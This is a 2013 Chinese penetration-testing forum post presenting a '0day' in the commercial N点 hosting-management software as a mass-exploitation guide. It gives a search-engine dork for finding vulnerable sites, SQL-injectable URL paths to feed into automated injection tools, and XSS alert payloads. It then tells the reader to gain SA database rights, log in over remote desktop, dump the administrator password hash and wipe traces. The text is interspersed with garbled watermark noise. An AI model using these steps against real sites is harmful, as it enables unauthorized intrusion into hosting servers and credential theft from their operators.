中国网络渗透测试联盟
标题:
N点商业版漏洞通杀0day以及利用方法
[打印本页]
作者:
admin
时间:
2013-3-3 08:06
标题:
N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西
# n* H3 A$ d0 U$ S; f( H
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
, h( O- l9 Z! p+ }
好吧 抱怨一下就行了 接下来关键的时候到了
2 U- z) J& o, N& P, j' Z- y
首先百度搜索关键字:inurl: (mmdatabase.asp)
& o! ]3 C a- ~# k
我随便列举一个:
www.xxxx.com
0 q0 m5 V: A8 `8 v. o
修改链接:
http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
: _9 i0 J3 T+ z. ~" \$ m m
扔入NBSI 或者啊D等各种傻逼工具后
3 V( | K& v+ U7 [& `
你们会看到是SA权限
: u7 R$ j9 n, e* t$ g, Q+ T; ?
果断3389 上去 hash得到administrator密码
1 I: s5 T3 I4 c' ~% |1 V
擦屁股走人~
8 B: _' ~/ }4 ~) d% p& T
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
! R) g, J+ W, r( K# o+ [
9 Y& D8 g& s, w3 r1 M8 m' {# \. P
再附上其他几个漏洞页面
- z' @- q. h5 Q* p
SQL:
3 t" Z8 L: U/ Q" @9 p# @
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
, U8 b& V" I4 V. V; V
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
; {% G8 S% Z- h, N _* o
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
# }. O" ]0 j; o' j' T7 l8 ?! O2 g
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
8 d: V7 @# D/ e& L' d
XSS证明:
# ^( H) R1 B$ ~- Z( u! o3 X2 F- _' U+ k
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
' T- U5 U7 a" w* E! P* Y) {4 G
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
/ u! F1 W5 | q" y o, L4 ^
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn
<script>alert(42873)</script>
2 J8 Q$ R6 ~8 h9 J% ?) Y4 d! [
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
' x& f) F6 y, _3 d
还是星外吧 你们懂的
( {% `9 [& [9 |9 Y
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
- M* \* l, _6 p& O! C
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
. Q9 f, n; w& u( q; u
——-
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2